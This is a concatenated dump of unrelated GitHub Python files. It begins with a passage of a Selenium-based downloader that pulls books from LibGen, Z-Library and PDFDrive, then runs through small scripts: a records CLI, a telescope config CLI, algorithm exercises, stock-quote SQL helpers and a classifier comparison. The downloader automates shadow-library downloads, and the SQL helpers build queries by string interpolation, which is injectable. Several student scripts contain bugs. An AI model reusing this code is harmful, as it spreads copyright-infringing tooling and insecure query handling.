AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36\"\n options = webdriver.ChromeOptions()\n options.headless = True\n options.add_argument(f\"user-agent={user_agent}\")\n options.add_argument(\"--window-size=1920,1080\")\n options.add_argument(\"--ignore-certificate-errors\")\n options.add_argument(\"--allow-running-insecure-content\")\n options.add_argument(\"--disable-extensions\")\n options.add_argument(\"--proxy-server='direct://'\")\n options.add_argument(\"--proxy-bypass-list=*\")\n options.add_argument(\"--start-maximized\")\n options.add_argument(\"--disable-gpu\")\n options.add_argument(\"--disable-dev-shm-usage\")\n options.add_argument(\"--no-sandbox\")\n options.add_experimental_option(\"detach\", True)\n driver = webdriver.Chrome(resource_path(\"chromedriver.exe\"), options=options)\n params = {\"behavior\": \"allow\", \"downloadPath\": downloads_path}\n driver.execute_cdp_cmd(\"Page.setDownloadBehavior\", params)\n download_complete_via_selenium = False\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n if website == \"pdfdrive\":\n try:\n driver.get(download_link)\n except:\n info_text.config(text=\"Servor Error. Please Try Again\")\n button_1['state'] = \"normal\"\n driver.implicitly_wait(10)\n webdriver.ActionChains(driver).send_keys(Keys.ESCAPE).perform()\n content = driver.find_elements(By.CLASS_NAME, \"btn.btn-success.btn-responsive\") \n if len(content) == 0:\n content = driver.find_element(By.CLASS_NAME, \"btn.btn-primary.btn-user\") \n else:\n content = driver.find_element(By.CLASS_NAME, \"btn.btn-success.btn-responsive\") \n elif website == \"zlib\":\n try:\n driver.get(download_link)\n except:\n info_text.config(text=\"Servor Error. Please Try Again\")\n button_1['state'] = \"normal\"\n content = driver.find_element(By.CLASS_NAME, \"book-details-button\")\n # --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n content.click()\n # --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n title_of_book = \"\"\n if website == \"pdfdrive\":\n print(\"Downloading E-Book from PDF-Drive Please check your Downloads Folder\")\n info_text.config(text=\"Downloading....\")\n title_of_book = book_title_for_pdfdrive(download_link)\n title_of_book = remove_unwanted_characters_for_pdfdrive(title_of_book)\n title_of_book = title_of_book + \" ( PDFDrive )\"\n file_name_pdfdrive = \"\" \n path_to_file = \"\" \n while True:\n for fname in os.listdir(downloads_path):\n if fname.endswith('.crdownload'):\n if(file_name_pdfdrive == \"\"):\n file_name_pdfdrive = fname.split(\".crdownload\")[0]\n path_to_file = f\"{downloads_path}\\\\{file_name_pdfdrive}\"\n try:\n file_size = os.path.getsize(f\"{downloads_path}\\\\{fname}\")\n info_text.config(text=f'Downloading....{round((file_size / (1024 * 1024)),1)} {byte_info_for_pdfdrive.split()[1]} / {byte_info_for_pdfdrive}')\n time.sleep(0.2)\n except Exception as e:\n print(e)\n elif (fname == file_name_pdfdrive):\n path_to_file = f\"{downloads_path}\\\\{file_name_pdfdrive}\" \n break\n try:\n file_exists = exists(path_to_file)\n if file_exists:\n break\n except Exception as e:\n print(e)\n pass\n epub_to_pdf_gen()\n download_complete_via_selenium = True\n button_1['state'] = \"normal\"\n info_text.config(text=\"Book has been downloaded!\")\n driver.quit()\n elif website == \"zlib\":\n result = requests.get(driver.current_url)\n soup = BeautifulSoup(result.text, \"lxml\")\n try:\n driver.find_element(By.CLASS_NAME, \"download-limits-error\")\n download_complete_via_selenium = False\n print(\"Zlibs Daily Limit Error\")\n except:\n print(\"Downloading E-Book from Zlib \\nPlease check your Downloads Folder\")\n info_text.config(text=\"Downloading....\")\n title_of_book = book_title_for_zlib(download_link)\n title_of_book = remove_character_not_valid_in_pdfname(title_of_book)\n title_of_book = title_of_book + \" (z-lib.org)\"\n file_name_zlib = \"\" \n path_to_file = \"\" \n while True:\n for fname in os.listdir(downloads_path):\n if fname.endswith('.crdownload'):\n if(file_name_zlib == \"\"):\n file_name_zlib = fname.split(\".crdownload\")[0]\n path_to_file = f\"{downloads_path}\\\\{file_name_zlib}\"\n try:\n file_size = os.path.getsize(f\"{downloads_path}\\\\{fname}\")\n info_text.config(text=f'Downloading....{round((file_size / (1024 * 1024)),1)} MB / {str(pdf_size_to_download_for_zlib)}')\n time.sleep(0.2)\n except Exception as e:\n print(e)\n elif (fname == file_name_zlib):\n path_to_file = f\"{downloads_path}\\\\{file_name_zlib}\" \n break\n try:\n file_exists = exists(path_to_file)\n if file_exists:\n break\n except Exception as e:\n print(e)\n pass\n download_complete_via_selenium = True\n epub_to_pdf_gen()\n button_1['state'] = \"normal\"\n info_text.config(text=\"Book has been downloaded!\")\n driver.quit()\n return download_complete_via_selenium\n# -------------------------------------------------------------------------------------------------------------------------------------------------------------\n# --------------------------------------------------------------- SEARCH A BOOK ---------------------------------------------------------------------------------------------------------------------\ndef remove_unwanted_characters_from_author(a):\n char_list = \"/:?*<>|,.();\"\n for i in char_list:\n a = a.replace(i, \"\")\n return a\ndef easy_search_for_book(a):\n char_list = \":?;*,(|#[!@$%+={<\"\n for i in char_list:\n if(i in a):\n a = a.split(i)[0]\n break\n return a\n# ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\ndef search_the_book(author_, book_):\n author = author_\n book = book_\n characters_to_strip = \" .,;:/?!#*&^-}_{~`@$%)[](<>|+=\"\n author = author.strip(characters_to_strip)\n book = book.strip(characters_to_strip)\n author = remove_unwanted_characters_from_author(author)\n book = easy_search_for_book(book)\n# ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n extension_pdf = 'pdf'\n if(search_in_libgen(author, book, extension_pdf) == False):\n if(search_in_zlib(author, book, extension_pdf) == False):\n extension_epub = 'epub'\n if(search_in_libgen(author, book, extension_epub) == False):\n if(search_in_zlib(author, book, extension_epub) == False):\n extension_pdf = 'pdf'\n if(search_in_pdf_drive(author, book) == False):\n print('The Book is not available in the Ebook Format')\n info_text.config(text=\"Book Not Available\")\n button_1['state'] = \"normal\"\n# -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n# --------------------------------------------------------Current GUI -----------------------------------------------------------------------------------------------------------------------\nwindow = Tk()\nwindow.geometry(\"574x230\")\nwindow.title(\"Books.io\")\nphoto = PhotoImage(file=resource_path(\"book.png\"))\nwindow.iconphoto(False, photo)\nwindow.configure(bg=\"#FFFFFF\")\ncanvas = Canvas(window,bg=\"#FFFFFF\",height=287,width=574,bd=0,highlightthickness=0,relief=\"ridge\")\ncanvas.place(x=0, y=0)\ncanvas.create_text(27.600372314453125,96.34383392333984,anchor=\"nw\",text=\"Author\",fill=\"#000000\",font=(\"Abel Regular\", 20 * -1))\ninfo_text = Label(window,background=\"#FFFFFF\",text=\"\",font=(\"Abel Regular\", 7))\ninfo_text.place(relx=0.0,rely=1.0,anchor='sw')\ninfo_text_for_download = Label(window,background=\"#FFFFFF\",text=\"Tip: Use the exact Book Title and Author Name\",font=(\"Abel Regular\", 7),fg=\"green\")\ninfo_text_for_download.place(relx=0.16,rely=0.04)\ndef callback(url):\n webbrowser.open_new_tab(url)\ninfo_text_for_github = Label(window,background=\"#FFFFFF\",text=\"Give a star to our project\",fg=\"blue\",cursor=\"hand2\",font=(\"Abel Regular\", 7))\ninfo_text_for_github.pack()\ninfo_text_for_github.bind(\"\", lambda e: callback(\"https://github.com/RohitKonge/PDF-Version-of-any-Book\"))\ninfo_text_for_github.place(relx=1.0,rely=1.0,anchor='se')\ncanvas.create_text(32.243743896484375,28.401931762695312,anchor=\"nw\",text=\"Book\",fill=\"#000000\",font=(\"Abel Regular\", 20 * -1))\nentry_image_1 = PhotoImage(file=resource_path(\"entry_1.png\"))\nentry_bg_1 = canvas.create_image(316.0,38.5,image=entry_image_1)\nentry_1 = Text(font=(\"Abel Regular\", 10),bd=0,bg=\"#FFFFFF\",highlightthickness=0)\nentry_1.place(x=94.0,y=28.6,width=444.0,height=22.0)\nentry_image_2 = PhotoImage(file=resource_path(\"entry_2.png\"))\nentry_bg_2 = canvas.create_image(316.0,106.5,image=entry_image_2)\nentry_2 = Text(font=(\"Abel Regular\", 10),bd=0,bg=\"#FFFFFF\",highlightthickness=0)\nentry_2.place(x=94.0,y=96.6,width=444.0,height=22.0)\ndef btn_click():\n book_inp = entry_1.get(1.0, \"end-1c\")\n author_inp = entry_2.get(1.0, \"end-1c\")\n book_inp = book_inp.strip()\n author_inp = author_inp.strip()\n book_inp = book_inp.title()\n author_inp = author_inp.title()\n global keep_running\n if(book_inp == \"\" and author_inp == \"\"):\n info_text.config(text=\"Please enter the Book's Title and Author\")\n button_1['state'] = \"normal\"\n elif(book_inp == \"\" and author_inp != \"\"):\n info_text.config(text=\"Please enter the Book's Title\")\n button_1['state'] = \"normal\"\n else:\n keep_running = True\n search_the_book(author_inp, book_inp)\n thread_2 = Thread()\n thread_2.start()\n thread_2.join()\ndef thread_make():\n if(check_internet_connection()):\n info_text.config(text=\"Searching....\")\n button_1['state'] = \"disabled\"\n try:\n thread_1 = Thread(target=btn_click)\n thread_1.start()\n except:\n info_text.config(text=\"Please Restart the App\")\ndef check_internet_connection():\n connected_to_internet = False\n IPaddress = gethostbyname(gethostname())\n if IPaddress == \"127.0.0.1\":\n connected_to_internet = False\n info_text.config(text=\"Check your internet connection\")\n else:\n connected_to_internet = True\n return connected_to_internet\ncheck_internet_connection()\nbutton_image_1 = PhotoImage(file=resource_path(\"button_1.png\"))\nbutton_1 = Button(image=button_image_1,borderwidth=0,highlightthickness=0,command=thread_make,relief=\"flat\",cursor=\"hand2\",state=\"normal\")\nbutton_1.place(x=200.0,y=150.0,width=174.8668212890625,height=43.995155334472656)\ndef on_opening():\n for fname in os.listdir(downloads_path):\n if (fname.endswith('.part') or fname.endswith('.crdownload')):\n try:\n os_remove((f\"{downloads_path}\\\\{fname}\"))\n except Exception as e:\n print(e) \ndef on_closing():\n for fname in os.listdir(downloads_path):\n if (fname.endswith('.part') or fname.endswith('.crdownload')):\n try:\n os_remove((f\"{downloads_path}\\\\{fname}\"))\n except Exception as e:\n print(e)\n thread_2 = Thread()\n thread_2.start()\n thread_2.join()\n window.destroy()\non_opening()\nwindow.protocol(\"WM_DELETE_WINDOW\", on_closing)\nwindow.resizable(False, False)\nwindow.attributes('-topmost', 1)\nwindow.mainloop()\n# -------------------------------------------------------------- Current GUI ---------------------------------------------------------------------------------------\n# Code For .exe :\n# pyinstaller Books.py -n Books.io -w --add-binary chromedriver.exe;. -i book.png --add-data book.png;. --add-data entry_1.png;. --add-data entry_2.png;. --add-data button_1.png;.\n","repo_name":"RohitKonge/PDF-Version-of-any-Book","sub_path":"Books.py","file_name":"Books.py","file_ext":"py","file_size_in_byte":35211,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"32807061153","text":"import sys\r\n\r\nfrom student import Student, Grade\r\nfrom teacher import Teacher, Load\r\n\r\nstudent = []\r\nteacher = []\r\n\r\n\r\ndef addStudent():\r\n while True:\r\n print()\r\n print('T = Add Teacher')\r\n print('S = Add student')\r\n print()\r\n\r\n add = input('Choose T or S: ')\r\n add = add.upper()\r\n print()\r\n\r\n if add == 'S':\r\n idNum: str = input('Enter ID number: ')\r\n lastName = input('Enter Last name: ')\r\n firstName = input('Enter First Name: ')\r\n middleName = input('Enter Middle name: ')\r\n type = input('Enter Type: ')\r\n year = input('Enter Year level: ')\r\n course = input('Enter Course: ')\r\n section = input('Enter Section: ')\r\n print('_____________________________________________________________________________________________________')\r\n introToComputing = int(input('Enter Introduction to Computing grade: '))\r\n archOrg = int(input('Enter Architecture and Organization grade: '))\r\n sysFun = int(input('Enter System Fundamentals grade: '))\r\n oop = int(input('Enter Object-oriented Programming grade: '))\r\n\r\n student1 = Grade(introToComputing, archOrg, sysFun, oop)\r\n student1.lastName = lastName\r\n student1.firstName = firstName\r\n student1.middleName = middleName\r\n student1.type = type\r\n student1.year = year\r\n student1.course = course\r\n student1.section = section\r\n student1.append(student1)\r\n\r\n\r\n elif add == 'T':\r\n idNum = input('Enter ID number: ')\r\n lastName = input('Enter Last name: ')\r\n firstName = input('Enter FirstName: ')\r\n middleName = input('Enter Middle name: ')\r\n type = input('Enter Type: ')\r\n print('_____________________________________________________________________________________________________')\r\n department = input('Enter Department: ')\r\n position = input('Enter position: ')\r\n subjects = input('Enter Subjects: ')\r\n\r\n teacher1 = Load(subjects)\r\n teacher1.department = department\r\n teacher1.position = position\r\n teacher1.idNum = idNum\r\n teacher1.lastName = lastName\r\n teacher1.firstName = firstName\r\n teacher1.middleName = middleName\r\n teacher1.type = type\r\n teacher1.append(teacher1)\r\n\r\n else:\r\n menu()\r\n\r\n print()\r\n answer = input('Enter another? [y/n]: ')\r\n answer = answer.lower()\r\n\r\n if answer == 'y':\r\n break\r\n menu()\r\n\r\n\r\ndef delRecord():\r\n print()\r\n print('T = delete from Teacher')\r\n print('S = delete from Student')\r\n print('DT = Delete Teacher Record')\r\n print('DS = Delete Student Record')\r\n print('C = clear all')\r\n print()\r\n\r\n delete = input('What do you want to delete? ')\r\n delete = delete.upper()\r\n\r\n if delete == 'S':\r\n i: int = int(input('Enter Index number: '))\r\n student.pop(i)\r\n elif delete == 'T':\r\n i: int = int(input('Enter Index number: '))\r\n teacher.clear()\r\n elif delete == 'DT':\r\n teacher.clear()\r\n elif delete == 'DS':\r\n student.clear()\r\n elif delete == 'C':\r\n student.clear()\r\n teacher.clear()\r\n else:\r\n delRecord()\r\n\r\n menu()\r\n\r\n\r\ndef searRecord():\r\n print()\r\n print('T = search for Teacher')\r\n print('s - Search for Student')\r\n print()\r\n\r\n search = input('What type do you want to search? ')\r\n search = search.upper()\r\n\r\n if search == 'S':\r\n i = int(input('Enter Index number: '))\r\n print(\r\n f'{i} \\t | {student[i].getType()} \\t | {student[i].getName()} \\t | {student[i].getID()} \\t | {student[i].getYrCrSec()} \\t | {student[i].getAve()} ')\r\n elif search == 'T':\r\n i = int(input('Enter Index number: '))\r\n print(\r\n f'{i} \\t | {teacher[i].getType()} \\t | {teacher[i].getName()} \\t | {teacher[i].getID()} \\t | {teacher[i].getDeptPost()} \\t | {teacher[i].getSub()}')\r\n else:\r\n searRecord()\r\n menu()\r\n\r\n\r\ndef displayRecord():\r\n print()\r\n print('TD = display teacher')\r\n print('SD - display student')\r\n print('DA - display all')\r\n print()\r\n\r\n display1 = input('What type do you want to display? ')\r\n display1 = display1.upper()\r\n\r\n if display1 == 'SD':\r\n print()\r\n print('--------------------------------------------------------------------------------------------------')\r\n i = 0\r\n for s in student:\r\n print(\r\n f'{i} \\t | {student.getType()} \\t | {student.getName()} \\t | {student.getID()} \\t | {student.getYrCrSec()} \\t | {student.getAve()}')\r\n i += 1\r\n print('----------------------------------------------------------------------------------------------')\r\n\r\n elif display1 == 'TD':\r\n print()\r\n print('--------------------------------------------------------------------------------------------------')\r\n i = 0\r\n for t in teacher:\r\n print(\r\n f'{i} \\t | {teacher.getType()} \\t | {teacher.getName()} \\t | {teacher.getID()} \\t | {teacher.DeptPost()} \\t | {teacher.getSubject()}')\r\n i += 1\r\n print('----------------------------------------------------------------------------------------------')\r\n\r\n elif display1 == 'DA':\r\n print()\r\n print('--------------------------------------------------------------------------------------------------')\r\n i = 0\r\n for s in student:\r\n print(\r\n f'{i} \\t | {student.getType()} \\t | {student.getName()} \\t | {student.getID()} \\t | {student.getYrCrSec()} \\t | {student.getAve()}')\r\n i += 1\r\n\r\n i = 0\r\n for t in teacher:\r\n print(\r\n f'{i} \\t | {teacher.getType()} \\t | {teacher.getName()} \\t | {teacher.getID()} \\t | {teacher.DeptPost()} \\t | {teacher.getSubject()}')\r\n i += 1\r\n print('-----------------------------------------------------------------------------------------------------')\r\n\r\n else:\r\n displayRecord()\r\n menu()\r\n\r\n\r\ndef menu():\r\n print('------------------Menu---------------------')\r\n print('DR - delete record SR - search record')\r\n print('A - add record M - display all')\r\n print()\r\n\r\n choice = input('Enter a function: ')\r\n choice = choice.upper()\r\n\r\n if (choice == 'DR'):\r\n delRecord()\r\n elif (choice == 'A'):\r\n addStudent()\r\n elif (choice == 'SR'):\r\n searRecord()\r\n elif (choice == 'M'):\r\n displayRecord()\r\n else:\r\n print()\r\n\r\n\r\nmenu()\r\n","repo_name":"maeannnn/Assignment","sub_path":"display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":6813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30810760982","text":"\"\"\"\nCommand line utility for interacting with SKA Science Data Processor (SDP).\n\nUsage:\n ska-sdp COMMAND [options] [SDP_OBJECT] [...]\n ska-sdp COMMAND (-h|--help)\n ska-sdp (-h|--help)\n\nSDP Objects:\n pb Interact with processing blocks\n workflow Interact with available workflow definitions\n deployment Interact with deployments\n sbi Interact with scheduling block instances\n master Interact with Tango master device\n subarray Interact with Tango subarray device\n\nCommands:\n list List information of object from the Configuration DB\n get | watch Print all the information (i.e. value) of a key in the Config DB\n create Create a new, raw key-value pair in the Config DB;\n Run a workflow; Create a deployment\n update Update a raw key value from CLI\n edit Edit a raw key value from text editor\n delete Delete a single key or all keys within a path from the Config DB\n import Import workflow definitions from file or URL\n\"\"\"\nimport logging\nimport sys\n\nfrom docopt import docopt\nfrom ska_sdp_config import config\n\nfrom ska_sdp_config.ska_sdp_cli import (\n sdp_get,\n sdp_create,\n sdp_update,\n sdp_list,\n sdp_delete,\n sdp_import,\n)\n\nLOG = logging.getLogger(\"ska-sdp\")\nLOG.setLevel(logging.INFO)\nLOG.addHandler(logging.StreamHandler(sys.stdout))\n\nCOMMAND = \"COMMAND\"\n\n\ndef main(argv=None):\n \"\"\"Run ska-sdp.\"\"\"\n if argv is None:\n argv = sys.argv[1:]\n\n args = docopt(__doc__, argv=argv, options_first=True)\n cfg = config.Config()\n\n if args[COMMAND] == \"list\":\n sdp_list.main(argv, cfg)\n\n elif args[COMMAND] == \"get\" or args[COMMAND] == \"watch\":\n sdp_get.main(argv, cfg)\n\n elif args[COMMAND] == \"create\":\n sdp_create.main(argv, cfg)\n\n elif args[COMMAND] == \"update\" or args[COMMAND] == \"edit\":\n sdp_update.main(argv, cfg)\n\n elif args[COMMAND] == \"delete\":\n sdp_delete.main(argv, cfg)\n\n elif args[COMMAND] == \"import\":\n sdp_import.main(argv, cfg)\n\n else:\n LOG.error(\n \"Command '%s' is not supported. Run 'ska-sdp --help' to view usage.\",\n args[COMMAND],\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ska-telescope/sdp-config","sub_path":"src/ska_sdp_config/ska_sdp_cli/ska_sdp.py","file_name":"ska_sdp.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30650950835","text":"import sys\n\ndef find(n, k, s): # n은 순열의 인덱스, k는 이전 방문위치, s는 현재까지의 소모량\n global minV\n if n == N: # 순열이 완성된 경우\n s += e[k][0] # 사무실까지의 거리 추가\n if minV>s: # 기존의 최소값보다 작으면\n minV = s\n return\n elif minV <= s: # 순열이 완성되지 않았지만 합이 최소값보다 큰 경우\n return\n else:\n for i in range(1, N): # 순열의 n번 인덱스에 들어갈 숫자 선택\n if u[i] == 0:\n u[i] = 1\n find(n+1, i, s+e[k][i])\n u[i] = 0\n return\n\nsys.stdin = open('input.txt', 'r')\nT = int(input())\nfor tc in range(1, T+1):\n N = int(input())\n e = [list(map(int,input().split())) for x in range (N)]\n u = [0 for i in range(N+1)] # 사용한 숫자 표시\n p = [0 for i in range(N+1)] # 순열저장\n minV = 10000\n u[0] = 1 # 0번은 사무실이므로 고정\n find(1, 0, 0)\n print('#{} {}'.format(tc, minV))\n","repo_name":"pyjune/ssa2019","sub_path":"0326/전기카트2.py","file_name":"전기카트2.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24781572479","text":"from cs50 import get_float\n\nwhile True:\n dollars = get_float(\"Change owed: \")\n if dollars > 0:\n break\n\ncents = dollars * 100\nquaters = cents // 25\ncents -= quaters * 25\ndimes = cents // 10\ncents -= dimes * 10\nnickels = cents // 5\ncents -= nickels * 5\npennies = cents // 1\n\nprint(int(quaters + dimes + nickels + pennies))\n","repo_name":"marsiekiera/CS50x","sub_path":"pset6/cash/cash.py","file_name":"cash.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24232250315","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n def mirrorTree(self, root: TreeNode) -> TreeNode:\n '''递归方法,递归镜像左子节点和右子节点,结束条件是节点为根节点 O(n)'''\n if not root:\n return None\n else:\n root.left,root.right=self.mirrorTree(root.right),self.mirrorTree(root.left)\n return root\n #迭代法 每个子节点左右子树交换,然后组合O(n)\n if not root:return None\n #将二叉树中的节点逐层放入队列中,再迭代处理队列中的元素\n stack=[root]\n while stack:\n #每次从队列中拿一个节点,并交换这个节点的左右字数\n node=stack.pop(0)\n node.left, node.right = node.right, node.left\n #若当前节点的左子树不为空,放入队列等待后续处理\n if node.left:stack.append(node.left)\n # 若当前节点的右子树不为空,放入队列等待后续处理\n if node.right:stack.append(node.right)\n #返回处理完的根节点\n return root\n\n\n\n\n","repo_name":"liucheng2912/py","sub_path":"leecode/easy/2004/27二叉树的镜像.py","file_name":"27二叉树的镜像.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74683391527","text":"#Provided is a list of data about a store’s inventory where each item in the list represents the name of an item, how much is in stock, and how much it costs. Print out each item in the list with the same formatting, using the .format method (not string concatenation). For example, the first print statment should read The store has 12 shoes, each for 29.99 USD.\ninventory = [\"shoes, 12, 29.99\", \"shirts, 20, 9.99\", \"sweatpants, 25, 15.00\", \"scarves, 13, 7.75\"]\nfor x in inventory:\n #print(x)\n #print(type(x))\n a=x.split(',')\n #print(a)\n item=a[1]\n name=a[0]\n cost=a[2]\n print('The store has{} {}, each for{} USD.'.format(item, name, cost))\n","repo_name":"gammarayburst999/Coursera","sub_path":"Python_Basics/Week_04/question_05.py","file_name":"question_05.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"12906408876","text":"from project_shared import *\n\n\ndef is_table_exist(table_name, engine=engine) -> bool:\n with engine.connect() as connection:\n try:\n query_string = f'SELECT 1 FROM {table_name} LIMIT 1'\n result = connection.execute(query_string)\n return True if result else False\n except:\n return False\n\n\ndef ticker_lookup(ticker, table_name=QUOTE_TABLE_NAME, engine=engine) -> bool:\n with engine.connect() as connection:\n try:\n query_string = f'SELECT * FROM {table_name} WHERE ticker = \\'{ticker}\\' LIMIT 1'\n result = connection.execute(query_string)\n return True if result.rowcount > 0 else False\n except:\n return False\n\n\ndef get_quotes_by_ticker(ticker, start_date=None, end_date=None, table_name=QUOTE_TABLE_NAME, engine=engine):\n with engine.connect() as connection:\n try:\n query_string = f'SELECT dateTime, open, high, low, close FROM {table_name} WHERE ticker=\\'{ticker}\\''\n if start_date is not None:\n query_string += f' AND dateTime >= \\'{str(start_date)}\\' '\n if end_date is not None:\n query_string += f' AND dateTime <= \\'{str(end_date)}\\' '\n query_string += f' ORDER BY dateTime ASC'\n result = connection.execute(query_string)\n if result.rowcount > 0:\n # print(\"result.rowcount=\" + str(result.rowcount))\n return result.cursor.fetchall()\n else:\n return None\n except:\n return None\n","repo_name":"wideGenesis/upsilon_one","sub_path":"charter/sql_queries.py","file_name":"sql_queries.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16483205035","text":"import sys\nimport time\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n# for test data set\nfrom sklearn.model_selection import train_test_split\n# for cross-validation\nfrom sklearn.model_selection import cross_val_score\n# for classifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.svm import SVC\n# for dimension reduction\nfrom sklearn.feature_selection import SequentialFeatureSelector\n\n\n# for order by desc. return second element for sort\ndef takeAccu(elem):\n return elem[1]\n \n\n# analyze on the input data set using several models \n# data: dataframe of input file\n# type: kNN, RandomForest, DecisionTree, SVM\n# problem: what to classfy\n# dimension_reduction: 'Y' yes, 'No' no\ndef analyze(data, model_type, problem, dimension_reduction = 'N'):\n\n for p in problem:\n # separate data into paramters(x) and a value(y)\n df = data.loc[data[0].isin(p)]\n x=df.iloc[:,1:]\n y=df.iloc[:,0]\n print('Classification problem: {}'.format(p))\n print('\\tPicked data: x {}, y {}\\n'.format(x.shape, y.shape))\n\n\n ###################################\n # dimension reduction\n ###################################\n if dimension_reduction == 'Y':\n x = greedyBackward(model_type, x, y)\n\n ###################################\n # set aside 10% for a test later\n ###################################\n X_train,X_test,y_train,y_test=train_test_split(x,y,test_size=0.1) \n\n ###################################\n # set category hyperparameters for each model\n ###################################\n if model_type == 'kNN':\n categories = ['ball_tree','kd_tree','brute']\n elif model_type == 'RandomForest':\n categories = ['gini','entropy','log_loss']\n elif model_type == 'DecisionTree':\n categories = ['gini','entropy','log_loss']\n elif model_type == 'SVM':\n categories = ['linear','poly','rbf']\n\n\n for category in categories:\n k_scores = []\n hyper_score = []\n k_range = range(1, 11)\n if model_type == 'SVM':\n k_range = [0.001, 0.005, 0.01, 0.05, 0.01, 0.5, 1, 3, 5, 10]\n\n ###################################\n # cross validation to find proper hyper parameter\n ################################### \n for k in k_range:\n if model_type == 'kNN':\n model = KNeighborsClassifier(algorithm=category, n_neighbors=k)\n elif model_type == 'RandomForest':\n model = RandomForestClassifier(criterion=category, max_depth=k)\n elif model_type == 'DecisionTree':\n model = DecisionTreeClassifier(criterion=category, max_depth=k)\n elif model_type == 'SVM':\n model = SVC(kernel=category, C=k)\n\n # do a Cross-validation test\n scores = cross_val_score(model, X_train, y_train, cv=5)\n k_scores.append(scores.mean())\n if True:\n print('Testing: cross-vali, model: {}, category param: {}, number param: {}, score: {}'.format(model_type, category, k, scores.mean()))\n\n hyper_score.append((k, scores.mean()))\n\n ###################################\n # choose best hyperparameter from the hyper value we test above\n # pick the hyper parameter that yeilds the hightest score(or accuracy) \n hyper_score.sort(key=takeAccu, reverse=True)\n bestHyper = hyper_score[0][0]\n\n ###################################\n # test with a final validation set\n ###################################\n start = time.time()\n if model_type == 'kNN':\n model = KNeighborsClassifier(algorithm=category, n_neighbors=bestHyper)\n elif model_type == 'RandomForest':\n model = RandomForestClassifier(criterion=category, max_depth=bestHyper)\n elif model_type == 'DecisionTree':\n model = DecisionTreeClassifier(criterion=category, max_depth=bestHyper) \n elif model_type == 'SVM':\n model = SVC(kernel=category, C=bestHyper)\n\n model.fit(X_train, y_train) \n finalScore = model.score(X_test, y_test)\n end = time.time()\n print('Result : final-vali, model: {}, category param: {}, number param: {}, score: {}, time: {gap:.4f}\\n'.format(model_type, category, bestHyper, finalScore, gap = (end - start)))\n\n ###################################\n # show plot to see clearly\n ###################################\n if True:\n plt.plot(k_range, k_scores) \n plt.title('{} {} - Category param: {}, Reduced: {}'.format(p, model_type, category, dimension_reduction))\n plt.ylabel('Cross-Validated Accuracy')\n if model_type == 'kNN':\n plt.xlabel('Number param: k(how many neighbors)')\n elif model_type == 'RandomForest':\n plt.xlabel('Number param: k(max depth)')\n elif model_type == 'DecisionTree':\n plt.xlabel('Number param: k(max depth)')\n elif model_type == 'SVM':\n plt.xlabel('Number param: k(C, Regularization parameter)')\n plt.show()\n\n\n# reduce dimension on the input x, y\n# model_type: 'kNN', 'RandomForest', 'DecisionTree', 'SVM'\n# x,y: input data\n# howmany: how many features do you want to left\ndef greedyBackward(model_type, x, y, howmany = 4):\n print('Greedy Backward is in progress.')\n print('\\tbefore x shape: {}'.format(x.shape))\n\n if model_type == 'kNN':\n model = KNeighborsClassifier()\n elif model_type == 'RandomForest':\n model = RandomForestClassifier(max_depth=5)\n elif model_type == 'DecisionTree':\n model = DecisionTreeClassifier(max_depth=8)\n elif model_type == 'SVM':\n model = SVC()\n\n start = time.time()\n sfs = SequentialFeatureSelector(model, direction='backward', n_features_to_select=howmany, cv = 5)\n reduced_x = sfs.fit_transform(x,y)\n end = time.time()\n\n print('\\tafter x shape: {}'.format(reduced_x.shape))\n print('Reduced x: model {}, left features: {}, time: {gap:.4f}\\n'.format(model_type, sfs.get_feature_names_out(), gap = (end - start)))\n\n return reduced_x\n\n\ndef usage(exec_name):\n print('Usage:')\n print('\\tpython %s [arg1] [arg2] [arg3] [arg4]' % (exec_name))\n print('\\targ1: input data file')\n print('\\targ2: choose model. \"kNN\" \"RandomForest\" \"DecisionTree\" \"SVM\" are available')\n print('\\targ3: choose problem. 1:H,K 2:M,Y 3:I,J 4:H,K,M,Y,I,J') \n print('\\targ4: apply dimension reduction. Y,y:yes N,n:no') \n print('\\t\\tGreedy Backward Feature Elimination will be applied')\n print('Example:')\n print('\\tpython %s test.data kNN 1 N' % (exec_name))\n print('\\tpython %s test.data RandomForest 2 Y' % (exec_name))\n print('\\tpython %s test.data DecisionTree 3 N' % (exec_name))\n print('\\tpython %s test.data SVM 4 Y' % (exec_name))\n exit()\n\n\n# check arguments and return arguments\ndef checkarg(argv):\n if len(argv) != 5:\n usage(argv[0])\n else :\n model_type = argv[2]\n problem = argv[3]\n reduction = argv[4].upper()\n\n if not (argv[2] == 'kNN' or argv[2] == 'RandomForest' or argv[2] == 'DecisionTree' or argv[2] == 'SVM'):\n print('Error:')\n print('\\tcheck the argument [%s]' % 